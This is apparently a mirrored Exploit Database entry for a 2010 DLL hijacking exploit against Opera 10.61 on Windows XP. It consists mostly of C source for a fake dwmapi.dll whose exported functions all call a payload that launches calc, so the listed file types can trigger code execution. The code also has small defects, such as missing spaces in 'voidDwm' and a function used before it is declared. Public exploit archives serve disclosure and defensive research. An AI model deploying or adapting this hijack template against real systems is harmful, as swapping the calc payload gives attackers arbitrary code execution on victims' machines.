Opera 10.61 – ‘dwmapi.dll’ DLL Hijacking

• Exploit Database
• 13 阅读

• 作者： Nicolas Krassas
  日期： 2010-08-24
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14732/

• /* 
  Exploit Title: Opera DLL Hijacking Exploit ( dwmapi.dll )
  Date: 24/08/2010
  Author: Nicolas Krassas 
  http://twitter.com/Dinosn
  Version: Opera 10.61
  Tested on: Windows XP SP3
  The code is based on the exploit from "TheLeader"
  Vulnerable extensions: .htm .mht .mhtml .xht .xhtm .xhtl
  dwmapi.dll is used in other applications too
  */
  
  #include <windows.h>
  #define DLLIMPORT __declspec (dllexport)
  
  DLLIMPORT voidDwmDefWindowProc() { evil(); }
  DLLIMPORT voidDwmEnableBlurBehindWindow() { evil(); }
  DLLIMPORT voidDwmEnableComposition() { evil(); }
  DLLIMPORT voidDwmEnableMMCSS() { evil(); }
  DLLIMPORT voidDwmExtendFrameIntoClientArea() { evil(); }
  DLLIMPORT voidDwmGetColorizationColor() { evil(); }
  DLLIMPORT voidDwmGetCompositionTimingInfo() { evil(); }
  DLLIMPORT voidDwmGetWindowAttribute() { evil(); }
  DLLIMPORT voidDwmIsCompositionEnabled() { evil(); }
  DLLIMPORT voidDwmModifyPreviousDxFrameDuration() { evil(); }
  DLLIMPORT voidDwmQueryThumbnailSourceSize() { evil(); }
  DLLIMPORT voidDwmRegisterThumbnail() { evil(); }
  DLLIMPORT voidDwmSetDxFrameDuration() { evil(); }
  DLLIMPORT voidDwmSetPresentParameters() { evil(); }
  DLLIMPORT voidDwmSetWindowAttribute() { evil(); }
  DLLIMPORT voidDwmUnregisterThumbnail() { evil(); }
  DLLIMPORT voidDwmUpdateThumbnailProperties() { evil(); }
  
  int evil()
  {
  WinExec("calc", 0);
  exit(0);
  return 0;
  }